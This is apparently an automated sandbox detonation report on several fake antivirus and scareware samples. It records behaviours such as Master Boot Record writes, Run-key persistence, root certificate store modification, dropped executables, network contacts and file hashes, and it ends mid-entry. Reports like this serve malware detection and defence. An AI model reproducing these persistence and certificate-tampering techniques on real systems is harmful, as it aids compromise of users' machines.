File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 twinkcam.net udp
US 103.224.212.215:80 twinkcam.net tcp
US 8.8.8.8:53 ww25.twinkcam.net udp
US 199.59.243.225:80 ww25.twinkcam.net tcp

Files

memory/2484-0-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-2-0x0000000000220000-0x0000000000221000-memory.dmp

memory/2484-1-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-4-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-6-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2484-5-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-7-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-8-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-9-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-11-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-10-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-12-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2484-13-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-15-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-16-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-17-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-20-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-21-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-22-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-23-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-24-0x0000000000400000-0x0000000000A06000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

120s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\6AdwCleaner.exe\" -auto" C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46 C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46\Blob = 0f0000000100000014000000f45a0858c9cd920e647bad539ab9f1cfc77f24cb090000000100000016000000301406082b0601050507030306082b06010505070308140000000100000014000000daed6474149c143cabdd99a9bd5b284d8b3cc9d80b000000010000001400000055005300450052005400720075007300740000001d0000000100000010000000f919b9ccce1e59c2e785f7dc2ccf6708030000000100000014000000e12dfb4b41d7d9c32b30514bac1d81d8385e2d4620000000010000006a040000308204663082034ea003020102021044be0c8b500024b411d3362de0b35f1b300d06092a864886f70d0101050500308195310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d311d301b0603550403131455544e2d5553455246697273742d4f626a656374301e170d3939303730393138333132305a170d3139303730393138343033365a308195310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d311d301b0603550403131455544e2d5553455246697273742d4f626a65637430820122300d06092a864886f70d01010105000382010f003082010a0282010100ceaa813fa3a36178aa31005595119e270f1f1cdf3a9b826830c04a611df12f0efabe79f7a523ef55519684cddbe3b96e3e31d80a2067c7f4d9bf94eb47043e02ce2aa25d870409f6309d188a97b2aa1cfc41d2a136cbfb3d91bae7d97035fae4e790c39ba39bd33cf5129977b1b709e068e61cb8f39463886a6afe0b76c9bef422e467b9ab1a5e77c18507dd0d6cbfee06c7776a419ea70fd7fbee9417b7fc85bea4abc41c31ddd7b6d1e4f0efdf168fb25293d7a1d489a1072ebfe10112421e1ae1d89534db647928ffba2e11c2e5e85b9248fb470bc26cdaad328341f3a5e54170fd65906dfafa51c4f9bd962b19042cd36da7dcf07f6f8365e26aab8786750203010001a381af3081ac300b0603551d0f0404030201c6300f0603551d130101ff040530030101ff301d0603551d0e04160414daed6474149c143cabdd99a9bd5b284d8b3cc9d830420603551d1f043b30393037a035a0338631687474703a2f2f63726c2e7573657274727573742e636f6d2f55544e2d5553455246697273742d4f626a6563742e63726c30290603551d250422302006082b0601050507030306082b06010505070308060a2b0601040182370a0304300d06092a864886f70d01010505000382010100081f52b1374478dbfdceb9da959698aa556480b55a40dd21a5c5c1f35f2c4cc8475a69eae8f03535f4d025f3c8a6a4874abd1bb17308bdd4c3cab635bb59867731cda78014ae13effcb148f96b25252d51b62c6d45c198c88a565d3eee434e3e6b278ed03a4b850b5fd3ed6aa775cbd15a872f3975135a72b002819fbef00f845420626c69d4e14dc60d9943010d12968c789dbf50a2b144aa6acf177acf6f0fd4f824555ff0341649663e5046c96371383162b862b9f353ad6cb52ba212aa194f09da5ee793c68e1408fef0308018a086854dc87dd78b03fe6ed5f79d16ac922ca023e59c91521f94df179473c3b3c1c17105200078bd13521da83ecd001fc8 C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46\Blob = 190000000100000010000000e843ac3b52ec8c297fa948c9b1fb2819030000000100000014000000e12dfb4b41d7d9c32b30514bac1d81d8385e2d461d0000000100000010000000f919b9ccce1e59c2e785f7dc2ccf67080b00000001000000140000005500530045005200540072007500730074000000140000000100000014000000daed6474149c143cabdd99a9bd5b284d8b3cc9d8090000000100000016000000301406082b0601050507030306082b060105050703080f0000000100000014000000f45a0858c9cd920e647bad539ab9f1cfc77f24cb20000000010000006a040000308204663082034ea003020102021044be0c8b500024b411d3362de0b35f1b300d06092a864886f70d0101050500308195310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d311d301b0603550403131455544e2d5553455246697273742d4f626a656374301e170d3939303730393138333132305a170d3139303730393138343033365a308195310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d311d301b0603550403131455544e2d5553455246697273742d4f626a65637430820122300d06092a864886f70d01010105000382010f003082010a0282010100ceaa813fa3a36178aa31005595119e270f1f1cdf3a9b826830c04a611df12f0efabe79f7a523ef55519684cddbe3b96e3e31d80a2067c7f4d9bf94eb47043e02ce2aa25d870409f6309d188a97b2aa1cfc41d2a136cbfb3d91bae7d97035fae4e790c39ba39bd33cf5129977b1b709e068e61cb8f39463886a6afe0b76c9bef422e467b9ab1a5e77c18507dd0d6cbfee06c7776a419ea70fd7fbee9417b7fc85bea4abc41c31ddd7b6d1e4f0efdf168fb25293d7a1d489a1072ebfe10112421e1ae1d89534db647928ffba2e11c2e5e85b9248fb470bc26cdaad328341f3a5e54170fd65906dfafa51c4f9bd962b19042cd36da7dcf07f6f8365e26aab8786750203010001a381af3081ac300b0603551d0f0404030201c6300f0603551d130101ff040530030101ff301d0603551d0e04160414daed6474149c143cabdd99a9bd5b284d8b3cc9d830420603551d1f043b30393037a035a0338631687474703a2f2f63726c2e7573657274727573742e636f6d2f55544e2d5553455246697273742d4f626a6563742e63726c30290603551d250422302006082b0601050507030306082b06010505070308060a2b0601040182370a0304300d06092a864886f70d01010505000382010100081f52b1374478dbfdceb9da959698aa556480b55a40dd21a5c5c1f35f2c4cc8475a69eae8f03535f4d025f3c8a6a4874abd1bb17308bdd4c3cab635bb59867731cda78014ae13effcb148f96b25252d51b62c6d45c198c88a565d3eee434e3e6b278ed03a4b850b5fd3ed6aa775cbd15a872f3975135a72b002819fbef00f845420626c69d4e14dc60d9943010d12968c789dbf50a2b144aa6acf177acf6f0fd4f824555ff0341649663e5046c96371383162b862b9f353ad6cb52ba212aa194f09da5ee793c68e1408fef0308018a086854dc87dd78b03fe6ed5f79d16ac922ca023e59c91521f94df179473c3b3c1c17105200078bd13521da83ecd001fc8 C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.vikingwebscanner.com udp

Files

memory/2388-0-0x0000000000C70000-0x0000000000C9E000-memory.dmp

memory/2388-1-0x000007FEF5CA0000-0x000007FEF668C000-memory.dmp

memory/2388-2-0x000000001B260000-0x000000001B2E0000-memory.dmp

memory/2388-3-0x000000001B260000-0x000000001B2E0000-memory.dmp

memory/2388-4-0x000000001B260000-0x000000001B2E0000-memory.dmp

memory/2388-5-0x000000001B260000-0x000000001B2E0000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\Tar9A24.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

memory/2388-104-0x000007FEF5CA0000-0x000007FEF668C000-memory.dmp

memory/2388-105-0x000000001B260000-0x000000001B2E0000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

117s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe"

Signatures

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe"

Network

N/A

Files

memory/1784-0-0x0000000000EC0000-0x00000000010B2000-memory.dmp

memory/1784-1-0x0000000074D30000-0x000000007541E000-memory.dmp

memory/1784-2-0x0000000004CA0000-0x0000000004CE0000-memory.dmp

memory/1784-3-0x0000000004CA0000-0x0000000004CE0000-memory.dmp

memory/1784-4-0x0000000074D30000-0x000000007541E000-memory.dmp

memory/1784-5-0x0000000004CA0000-0x0000000004CE0000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240220-en

Max time kernel

142s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\SoftProz = "C:\\Program Files (x86)\\HjuTygFcvX\\lpsprt.exe" C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\HjuTygFcvX C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A
File created C:\Program Files (x86)\HjuTygFcvX\__tmp_rar_sfx_access_check_259398446 C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A
File created C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A
File opened for modification C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe"

C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe

"C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe"

Network

N/A

Files

\Program Files (x86)\HjuTygFcvX\lpsprt.exe

MD5 2e6360eeebcafd207ad6f4cfc81afdb3
SHA1 6d85d48c8c809ad0ee5f7b1b20ef79e871466072
SHA256 3a31f386f4a68827d8cbfeb087c017f871d80ab4565a2266f692fbe6cfea9c3b
SHA512 36e1cadeff91158c0e96585d7550dc193a6470f5fccf3cf98845c4291becc6dae39609771cc8157493bc6cb405446ac55a1790108c6c213293bf4a56ecf381e4

memory/2580-18-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2580-19-0x0000000000A10000-0x0000000000A90000-memory.dmp

memory/2580-20-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2580-21-0x000000001AFD0000-0x000000001B16C000-memory.dmp

memory/2580-23-0x0000000000A10000-0x0000000000A90000-memory.dmp

memory/2580-22-0x0000000000A10000-0x0000000000A90000-memory.dmp

memory/2580-24-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2580-25-0x0000000000A10000-0x0000000000A90000-memory.dmp

memory/2580-26-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2580-27-0x0000000000A10000-0x0000000000A90000-memory.dmp

memory/2580-28-0x0000000000A10000-0x0000000000A90000-memory.dmp

memory/2580-29-0x0000000000A10000-0x0000000000A90000-memory.dmp

memory/2580-30-0x0000000000A10000-0x0000000000A90000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

145s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\antiviruspc2009\libltdl3.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\libltdl3.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009 C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\bzip2.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\avpc2009.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\avpc2009.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\__tmp_rar_sfx_access_check_259417073 C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\bzip2.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A

Enumerates physical storage devices

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe"

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 yandex.ru udp
US 8.8.8.8:53 google.ru udp
RU 5.255.255.70:80 yandex.ru tcp
GB 216.58.213.3:80 google.ru tcp
RU 5.255.255.70:443 yandex.ru tcp

Files

\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 c18a7323332b3292a8e0f1c81df65698
SHA1 bcb8f34cbe0137e888d06acbcb6508417851a087
SHA256 9c42eca99e96a7402716fd865b57ea601fb9a18477fe2ab890bdbcd3052f68f8
SHA512 4d48d11f3d0a740b9193e17782c77b01f52dd6e8324755aa81188295a0caed0718d330453bb02ca8bc942ee5588928e57a0d89d90d6b1c32690338c5eae8e1ad

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 5836a2a04328c778e9a485fe7d8c7aaa
SHA1 5a3214379be96f52fc6c639de17efa6e66b12188
SHA256 98d6b205baa9c6167d2c7a7a4b4804f74a7795724dd894c2de0b6823b83e6f2a
SHA512 a66a9c1d97736d63fd9fc38743d9313b726f40c4f522065c71eb0f8f9c0b797e51f5927c7c03041b2cbcb7ae1b23ed46b0fba3eb0f946adb172bcb7ab5551948

\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 cfefcac1f28b2c3d8facac87c05fba83
SHA1 7370ffee89bea5ee9f298b6a5bdec945f1714175
SHA256 78b77d996c5c0f95ad044f219e5899858c2eda73b0c094e9b9228828f22fd501
SHA512 efa53779ea99553a3618b10e43ac6dd37cafb1fcf45ab7015f54925ecfe4aa9dd9c62258983f2e0e2f5dc221cc6fc669df2c26d610c58081719c301bc0e4e699

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 d794146696509541e8d1efbd2e9d0934
SHA1 dbb5b432734f357a28f42871dcedacfcd55053a7
SHA256 bef3c4dda6aafab6d7cc57eb921c51ca4bdba2365405810a551d652773a6d420
SHA512 b23ccb74a7cece8d4cca46d86c91688842414b0f28377bf59b29249e5c3743147797c9042806848f6dd40196d3d5e09ac217feb809c4f73139901fb611e50cb5

C:\Program Files (x86)\antiviruspc2009\libltdl3.dll

MD5 00a71b4afda8033235432b1c433fecc7
SHA1 d7b0c218aa8fec1c60ada26a09d9e0d9601985ca
SHA256 f9c9d2b92efb80f6d11df52735b8bddd099847cc79ba56650793b21a0923b1cd
SHA512 96635e66d9781ad4d2414271f6a0904cf880ed94fc19186ef4da5f88f24e14ef1591fdc90e27db15a6021847c592688d0034f20e2e50ca93bf8c6db27e8c510a

C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll

MD5 0ab7d0e87f3843f8104b3670f5a9af62
SHA1 10c09a12e318f0fbebf70c4c42ad6ee31d9df2e5
SHA256 8aecab563b3c629e8f9dcd525dc2d6b1903f6c600637e63b1efe05e3c64d757b
SHA512 e08e17167edf461c0fca1e8b649c0c395793e80f5400f5cbb7d7906d0c99e955fcf6be2300db8663d413c4b3ffb075112a6ce5bf259553c0fd3d76200ee0d375

\Program Files (x86)\antiviruspc2009\bzip2.dll

MD5 4143d4973e0f5a5180e114bdd868d4d2
SHA1 b47fd2cf9db0f37c04e4425085fb953cbce81478
SHA256 da25db24809479051d980be5e186926dd53233a76dfe357a455387646befca76
SHA512 e21827712a4870461921e7996506ffe456dd2303b69de370aa0499dde2e4747a73d8c0e8bd7d91c5bbc414ed5ee06f36d172237489494b3dd311ccd95ba07ebc

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 44d8f1b5659f5512ae3309e65ed77040
SHA1 c3f66712509d3613b4b77d02cebdb2227999431b
SHA256 a6570473a07f88638779ae2c84598c5536e864e0038fdfb76fa8b0acafae6560
SHA512 b30e5ed41d5beacd211a8df120556be52ad65df436fa1a29215799b22ee3014379b986a99e475d51a50df9907f8e1255e26d9cb81201d638833707af13a13efa

memory/2556-25-0x0000000068440000-0x0000000068457000-memory.dmp

memory/2556-24-0x000000006FDC0000-0x000000006FDCE000-memory.dmp

memory/2556-32-0x000000006FDC0000-0x000000006FDCE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

116s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\antiviruspc2009 C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\__tmp_rar_sfx_access_check_240604609 C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\bzip2.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\bzip2.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\avpc2009.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\libltdl3.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\avpc2009.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\libltdl3.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A

Enumerates physical storage devices

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe"

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 google.ru udp
US 8.8.8.8:53 yandex.ru udp
RU 77.88.55.60:80 yandex.ru tcp
GB 216.58.213.3:80 google.ru tcp
RU 77.88.55.60:443 yandex.ru tcp
US 8.8.8.8:53 3.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 60.55.88.77.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp

Files

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 c18a7323332b3292a8e0f1c81df65698
SHA1 bcb8f34cbe0137e888d06acbcb6508417851a087
SHA256 9c42eca99e96a7402716fd865b57ea601fb9a18477fe2ab890bdbcd3052f68f8
SHA512 4d48d11f3d0a740b9193e17782c77b01f52dd6e8324755aa81188295a0caed0718d330453bb02ca8bc942ee5588928e57a0d89d90d6b1c32690338c5eae8e1ad

C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll

MD5 0ab7d0e87f3843f8104b3670f5a9af62
SHA1 10c09a12e318f0fbebf70c4c42ad6ee31d9df2e5
SHA256 8aecab563b3c629e8f9dcd525dc2d6b1903f6c600637e63b1efe05e3c64d757b
SHA512 e08e17167edf461c0fca1e8b649c0c395793e80f5400f5cbb7d7906d0c99e955fcf6be2300db8663d413c4b3ffb075112a6ce5bf259553c0fd3d76200ee0d375

C:\Program Files (x86)\antiviruspc2009\bzip2.dll

MD5 4143d4973e0f5a5180e114bdd868d4d2
SHA1 b47fd2cf9db0f37c04e4425085fb953cbce81478
SHA256 da25db24809479051d980be5e186926dd53233a76dfe357a455387646befca76
SHA512 e21827712a4870461921e7996506ffe456dd2303b69de370aa0499dde2e4747a73d8c0e8bd7d91c5bbc414ed5ee06f36d172237489494b3dd311ccd95ba07ebc

C:\Program Files (x86)\antiviruspc2009\libltdl3.dll

MD5 00a71b4afda8033235432b1c433fecc7
SHA1 d7b0c218aa8fec1c60ada26a09d9e0d9601985ca
